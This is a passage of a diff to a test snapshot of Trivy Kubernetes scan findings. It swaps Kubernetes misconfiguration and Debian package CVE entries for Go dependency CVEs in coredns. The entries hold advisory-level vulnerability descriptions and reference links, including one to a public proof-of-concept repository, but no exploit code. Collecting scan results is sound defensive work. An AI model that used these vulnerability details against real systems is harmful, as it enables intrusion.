the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, ], "severity": "MEDIUM", @@ -54430,2796 +54390,2560 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.35.9", + "packageName": "github.com/aws/aws-sdk-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": undefined, + "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2020-8912", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2020-8912", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3715", - "installedVersion": "5.1-2+deb11u1", - "packageName": "bash", + "fixedVersion": "1.3.2", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-3121", + "installedVersion": "v1.3.1", + "packageName": "github.com/gogo/protobuf", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0340", - "https://access.redhat.com/security/cve/CVE-2022-3715", - "https://bugzilla.redhat.com/2126720", - "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", - "https://errata.almalinux.org/9/ALSA-2023-0340.html", - "https://errata.rockylinux.org/RLSA-2023:0340", - "https://linux.oracle.com/cve/CVE-2022-3715.html", - "https://linux.oracle.com/errata/ELSA-2023-0340.html", - "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", - "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "https://access.redhat.com/security/cve/CVE-2021-3121", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "https://pkg.go.dev/vuln/GO-2021-0053", + "https://security.netapp.com/advisory/ntap-20210219-0006/", + "https://www.cve.org/CVERecord?id=CVE-2021-3121", ], }, "category": "Vulnerability", - "description": "A flaw was found in the bash package, where a heap-buffer overflow can occur in valid parameter_transform. This issue may lead to memory problems.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", "mitigation": undefined, - "name": "a heap-buffer-overflow in valid_parameter_transform", + "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3715", + "value": "https://avd.aquasec.com/nvd/cve-2021-3121", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0340", + "value": "https://access.redhat.com/security/cve/CVE-2021-3121", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3715", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2126720", + "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2126720", + "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3715", + "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0340.html", + "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0340", + "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3715.html", + "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0340.html", + "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-bash/2022-08/msg00147.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3715", + "value": "https://pkg.go.dev/vuln/GO-2021-0053", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3715", + "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "fixedVersion": "1.11.1", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-21698", + "installedVersion": "v1.8.0", + "packageName": "github.com/prometheus/client_golang", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/errata/RHSA-2022:8057", + "https://access.redhat.com/security/cve/CVE-2022-21698", + "https://bugzilla.redhat.com/2044628", + "https://bugzilla.redhat.com/2045880", + "https://bugzilla.redhat.com/2050648", + "https://bugzilla.redhat.com/2050742", + "https://bugzilla.redhat.com/2050743", + "https://bugzilla.redhat.com/2065290", + "https://bugzilla.redhat.com/2107342", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107376", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2107390", + "https://bugzilla.redhat.com/2107392", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "https://errata.rockylinux.org/RLSA-2022:8057", + "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "https://github.com/prometheus/client_golang/pull/962", + "https://github.com/prometheus/client_golang/pull/987", + "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "https://linux.oracle.com/cve/CVE-2022-21698.html", + "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "https://pkg.go.dev/vuln/GO-2022-0322", + "https://www.cve.org/CVERecord?id=CVE-2022-21698", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "Denial of service using InstrumentHandlerCounter", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", - }, - { - "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - }, - { - "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://avd.aquasec.com/nvd/cve-2022-21698", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://access.redhat.com/errata/RHSA-2022:8057", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", - ], - }, - "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://access.redhat.com/security/cve/CVE-2022-21698", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://bugzilla.redhat.com/2044628", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://bugzilla.redhat.com/2045880", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/2050648", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2050742", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2050743", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/2065290", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/2107342", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2107374", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://bugzilla.redhat.com/2107376", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": 